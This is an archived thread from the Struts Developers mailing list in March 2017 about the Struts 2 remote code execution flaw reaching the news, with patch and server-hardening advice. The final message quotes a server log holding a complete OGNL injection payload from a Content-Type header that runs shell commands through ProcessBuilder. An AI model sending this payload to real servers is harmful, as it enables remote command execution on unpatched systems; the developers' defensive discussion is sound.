Quantcast

S2 makes Hacker News :/

classic Classic list List threaded Threaded
10 messages Options
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

S2 makes Hacker News :/

Dave Newton-6
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Lukasz Lenart
2017-03-09 15:45 GMT+01:00 Dave Newton <[hidden email]>:
> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites

Yeah... this is a sad news, even if we tried our best to keep this
confidential ...


Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Rene Gielen-2
More of that...
http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC

Am 09.03.17 um 16:04 schrieb Lukasz Lenart:
> 2017-03-09 15:45 GMT+01:00 Dave Newton <[hidden email]>:
>> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
>
> Yeah... this is a sad news, even if we tried our best to keep this
> confidential ...
>
>
> Regards
>

--
René Gielen
http://twitter.com/rgielen

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Louis Smith
Sad, but what should have been the story is how rapidly the fixes were made
available, and how a properly setup server would not be vulnerable

Louis


On Tue, Mar 14, 2017 at 8:09 AM, Rene Gielen <[hidden email]> wrote:

> More of that...
> http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
>
> Am 09.03.17 um 16:04 schrieb Lukasz Lenart:
> > 2017-03-09 15:45 GMT+01:00 Dave Newton <[hidden email]>:
> >> https://arstechnica.com/security/2017/03/critical-
> vulnerability-under-massive-attack-imperils-high-impact-sites
> >
> > Yeah... this is a sad news, even if we tried our best to keep this
> > confidential ...
> >
> >
> > Regards
> >
>
> --
> René Gielen
> http://twitter.com/rgielen
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [hidden email]
> For additional commands, e-mail: [hidden email]
>
>
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Doug Erickson
What is the proper server setup to prevent this?

> On Mar 14, 2017, at 7:08 AM, Louis Smith <[hidden email]> wrote:
>
> Sad, but what should have been the story is how rapidly the fixes were made
> available, and how a properly setup server would not be vulnerable
>
> Louis
>
>
>> On Tue, Mar 14, 2017 at 8:09 AM, Rene Gielen <[hidden email]> wrote:
>>
>> More of that...
>> http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
>>
>>> Am 09.03.17 um 16:04 schrieb Lukasz Lenart:
>>> 2017-03-09 15:45 GMT+01:00 Dave Newton <[hidden email]>:
>>>> https://arstechnica.com/security/2017/03/critical-
>> vulnerability-under-massive-attack-imperils-high-impact-sites
>>>
>>> Yeah... this is a sad news, even if we tried our best to keep this
>>> confidential ...
>>>
>>>
>>> Regards
>>>
>>
>> --
>> René Gielen
>> http://twitter.com/rgielen
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: [hidden email]
>> For additional commands, e-mail: [hidden email]
>>
>>

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Lukasz Lenart
2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
> What is the proper server setup to prevent this?

Upgrade to the latest Struts version ... and run server on a dedicated
account, block access to the world (sever should be only allowed to
connect to localhost) and few other things


Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Doug Erickson


> On Mar 14, 2017, at 12:17 PM, Lukasz Lenart <[hidden email]> wrote:
>
> 2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
>> What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [hidden email]
> For additional commands, e-mail: [hidden email]
>

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Greg Huber
In reply to this post by Lukasz Lenart
Just because you are using s2, does not necessarily mean you are affected,
all I get is a response :

HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close

Looking at my logs this fishing is going on all the time.

Thanks also Lukasz for the quick fix.

Cheers Greg




On 14 March 2017 at 18:17, Lukasz Lenart <[hidden email]> wrote:

> 2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
> > What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [hidden email]
> For additional commands, e-mail: [hidden email]
>
>
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Martin Gainty




________________________________
From: Greg Huber <[hidden email]>
Sent: Thursday, March 16, 2017 5:19 AM
To: Struts Developers List
Subject: Re: S2 makes Hacker News :/

Just because you are using s2, does not necessarily mean you are affected,
all I get is a response :

HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close

Looking at my logs this fishing is going on all the time.

MG>from what i read injections only happen with Content-Type injection

MG>then again patches  Struts 2.3.32 or 2.5.10.1 has been available for some time

MG>Johannes suggests implementing 'snort' to detect injection vulnerability reference link at sans.edu below:
https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/

MG>Thanks Lukasz!

Thanks also Lukasz for the quick fix.

Cheers Greg




On 14 March 2017 at 18:17, Lukasz Lenart <[hidden email]> wrote:

> 2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
> > What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
Łukasz Lenart - strona domowa<http://www.lenart.org.pl/>
www.lenart.org.pl
pasja ciągle coś nowego. programowanie, tworzenie jest dla mnie życiową pasją, jak dotąd udaje mi sie łączyć to co lubię z tym za co mi płacą i ...



>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [hidden email]
> For additional commands, e-mail: [hidden email]
>
>
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: S2 makes Hacker News :/

Greg Huber
Looking at my logs I can see some activity: GRRR :

179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action
HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"


2017-03-24 08:39:13,649 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Request exceeded size limit!
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException:
the request doesn't contain a multipart/form-data or multipart/mixed
stream, content type header is %{(#nike='multipart/form-data'
).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_
memberAccess?(#_memberAccess=#dm):((#container=#context['
com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.
getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.
getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#
iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/
c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#
cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@
org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@
org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.
flush())}

On 16 March 2017 at 12:45, Martin Gainty <[hidden email]> wrote:

>
>
>
>
> ________________________________
> From: Greg Huber <[hidden email]>
> Sent: Thursday, March 16, 2017 5:19 AM
> To: Struts Developers List
> Subject: Re: S2 makes Hacker News :/
>
> Just because you are using s2, does not necessarily mean you are affected,
> all I get is a response :
>
> HTTP/1.1 404
> Content-Length: 0
> Date: Thu, 16 Mar 2017 09:02:54 GMT
> Connection: close
>
> Looking at my logs this fishing is going on all the time.
>
> MG>from what i read injections only happen with Content-Type injection
>
> MG>then again patches  Struts 2.3.32 or 2.5.10.1 has been available for
> some time
>
> MG>Johannes suggests implementing 'snort' to detect injection
> vulnerability reference link at sans.edu below:
> https://isc.sans.edu/forums/diary/Critical+Apache+Struts+
> 2+Vulnerability+Patch+Now/22169/
>
> MG>Thanks Lukasz!
>
> Thanks also Lukasz for the quick fix.
>
> Cheers Greg
>
>
>
>
> On 14 March 2017 at 18:17, Lukasz Lenart <[hidden email]> wrote:
>
> > 2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
> > > What is the proper server setup to prevent this?
> >
> > Upgrade to the latest Struts version ... and run server on a dedicated
> > account, block access to the world (sever should be only allowed to
> > connect to localhost) and few other things
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
> Łukasz Lenart - strona domowa<http://www.lenart.org.pl/>
> www.lenart.org.pl
> pasja ciągle coś nowego. programowanie, tworzenie jest dla mnie życiową
> pasją, jak dotąd udaje mi sie łączyć to co lubię z tym za co mi płacą i ...
>
>
>
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: [hidden email]
> > For additional commands, e-mail: [hidden email]
> >
> >
>
Loading...